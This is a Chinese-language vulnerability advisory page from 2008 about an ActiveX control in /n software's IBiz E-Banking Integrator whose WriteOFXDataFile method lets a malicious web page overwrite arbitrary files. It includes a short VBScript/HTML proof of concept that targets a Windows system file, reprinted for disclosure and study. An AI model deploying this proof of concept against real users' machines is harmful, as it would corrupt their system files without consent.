服务器 > 网络安全 > 漏洞分析

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞

66人参与 2008-10-08 漏洞分析

受影响系统:
/n software ibiz e-banking integrator 2.0
描述:
--------------------------------------------------------------------------------
bugtraq id: 28700 ibiz e-banking integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。 ibiz e-banking integrator所提供的ibizebank.fiprofile.1 activex控件(fiprofile20.ocx)没有正确地处理对writeofxdatafile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。 <*来源:shinnai (shinnai@autistici.org)

链接:http://secunia.com/advisories/29758/
*> 测试方法:
-------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <object classid='clsid:24445430-f789-11ce-86f8-0020afd8c6db' id='test'></object> <input language=vbscript onclick=tryme() type=button value='click here to start the test'> <script language='vbscript'>
sub tryme()
on error resume next
test.writeofxdatafile "c:\windows\system_.ini"
if err.number <> 0 then
msgbox "something went wrong!"
else
msgbox "exploit completed!"
end if
end sub
</script> 建议:
--------------------------------------------------------------------------------
厂商补丁: /n software
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.nsoftware.com/ibiz/ebank/default.aspx
(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞

10-08

Cisco Unified Communications 远程命令执行漏洞

10-08

FoosunCMS Sql Injection Vulnerability

10-08

Microsoft Project资源内存分配远程代码执行漏洞(MS08-018)

10-08

MS08-001 - Windows TCP/IP中的漏洞可能允许远程执行代码(941644)

10-08

Cisco Unified IP Phone SCCP及SIP 协议安全漏洞

10-08

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论